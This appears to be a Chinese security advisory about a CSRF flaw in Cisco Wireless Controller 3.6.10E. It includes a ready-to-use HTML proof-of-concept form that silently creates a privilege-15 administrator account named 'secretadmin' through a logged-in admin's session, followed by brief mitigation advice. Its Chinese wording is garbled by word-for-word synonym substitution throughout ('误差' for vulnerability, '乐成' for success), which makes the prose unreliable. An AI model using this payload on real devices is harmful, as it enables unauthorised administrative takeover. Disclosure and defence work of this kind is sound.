Cisco Wireless Controller 3.6.10E CSRF误差清静通告

宣布时间 2019-07-26

误差编号和级别


CVE编号:暂无 ,危险级别:高危 ,CVSS分值:官方未评定


影响版本


受影响的版本


适用于Cisco Wireless Controller 3.6.10E。


误差概述


Cisco Wireless Controller 3.6.10E是Cisco宣布的一款无线控制器 ,可为要害使命提供可靠的性能。


Cisco Wireless Controller 3.6.10E容易受到CSRF攻击 ,攻击者将全心设计的请求发送给具有管理员级别会见权限的用户 ,翻开URL后 ,将通过管理员的会话提交表单 ,并乐成将新用户添加为管理员。


误差验证


<html>


<body>


<form action="http://IP/security/cfgSecurityAAAUsersCreate


<http://192.168.1.1/security/cfgSecurityAAAUsersCreate>" method="POST">


<input type="hidden" name="username" value="secretadmin" />


<input type="hidden" name="privilege" value="15" />


<input type="hidden" name="password" value="K3Y" />


<input type="hidden" name="description" value="CSRF" />


<input type="hidden" name="type" value="lobby-admin" />


<input type="hidden" name="cfnpassword" value="K3Y" />


<input type="hidden" name="yearlife" value="2013" />


<input type="hidden" name="hourlife" value="16" />


<input type="hidden" name="monthlife" value="7" />


<input type="hidden" name="minlife" value="17" />


<input type="hidden" name="datelife" value="16" />


<input type="hidden" name="seclife" value="0" />


<input type="submit" value="submit" />


</form>


</body>


</html>


修复建议


1、关注官方网站 ,实时举行更新 ;


2、验证HTTP Referer字段 ;


3、在请求地址中添加token并验证 ;


4、在HTTP头中自界说属性并验证。


参考链接